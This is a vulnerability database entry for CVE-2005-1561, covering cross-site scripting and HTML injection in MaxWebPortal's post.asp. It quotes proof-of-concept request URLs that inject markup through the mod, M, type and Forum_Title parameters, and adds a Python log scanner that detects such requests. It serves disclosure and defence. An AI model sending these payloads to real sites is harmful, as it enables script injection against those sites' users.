MaxWebPortal Multiple Remote Vulnerabilities

Vulnerability ID: 1108774
Vulnerability type: Cross-site scripting
Published: 2005-05-11
Updated: 2005-10-20
CVE ID: CVE-2005-1561
CNNVD-ID: CNNVD-200505-941
Platform: ASP
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/25651
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-941
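|Vulnerability details
Multiple cross-site scripting (XSS) vulnerabilities exist in post.asp in MaxWebPortal 1.3.5 and earlier. A remote attacker can inject arbitrary web script or HTML through the (1) mod, (2) M, or (3) type parameter.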
|Exploit (EXP)
source: http://www.securityfocus.com/bid/13601/info

MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.

MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues. 

Cross-site Scripting:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>

HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>
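The following Python check is an added example, not code from the advisory or from MaxWebPortal. It flags post.asp requests whose mod, M or type value, or whose Forum_Title value, decodes to HTML metacharacters or a NUL byte. The function names and the sample request targets are constructed for illustration, and the input is assumed to be the request path plus query string as recorded by the web server.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as XSS entry points in post.asp.
# ASP reads query-string keys case-insensitively, so compare in lower case.
XSS_PARAMS = {"mod", "m", "type"}
# Characters that let a value close an HTML attribute or open a tag.
HTML_META = re.compile(r"[<>\"']")

def suspicious_params(request_target):
    """Return the sorted post.asp parameter names whose decoded value
    contains HTML metacharacters (or, for Forum_Title, a NUL byte)."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/post.asp"):
        return []  # only the page named in the advisory is in scope
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        key = name.strip().lower()
        if key in XSS_PARAMS and HTML_META.search(value):
            hits.add(key)
        elif key == "forum_title" and ("\x00" in value or HTML_META.search(value)):
            hits.add(key)
    return sorted(hits)

def scan(targets):
    """Map each flagged request target to the parameters that triggered."""
    flagged = {}
    for target in targets:
        hits = suspicious_params(target)
        if hits:
            flagged[target] = hits
    return flagged

# Constructed sample request targets (percent-encoded, as a server would log them).
SAMPLE_TARGETS = [
    "/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat",
    "/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=%00General+Chat"
    "&mod=%22%3E%3Cplaintext%3E",
    "/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat"
    "&M=%22%3E%3Cplaintext%3E",
    "/post.asp?method=Reply&type=quote",
    "/default.asp?mod=%3Cb%3E",
]

if __name__ == "__main__":
    for target, names in scan(SAMPLE_TARGETS).items():
        print(names, target)
```

The same character test, applied server-side before the values are written into the page, is where HTML-encoding the output belongs.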
|References

Source: XF
Name: maxwebportal-postasp-xss(20560)
Link: http://xforce.iss.net/xforce/xfdb/20560
Source: SECUNIA
Name: 15329
Link: http://secunia.com/advisories/15329
Source: BUGTRAQ
Name: 20050511[HSCSecurityGroup]MaxWebPortal-MultipleSQLinjection/XSS
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111584883727605&w=2
Source: BID
Name: 13601
Link: http://www.securityfocus.com/bid/13601
Source: MISC
Link: http://www.hackerscenter.com/archive/view.asp?id=2542
Source: OSVDB
Name: 16501
Link: http://www.osvdb.org/16501
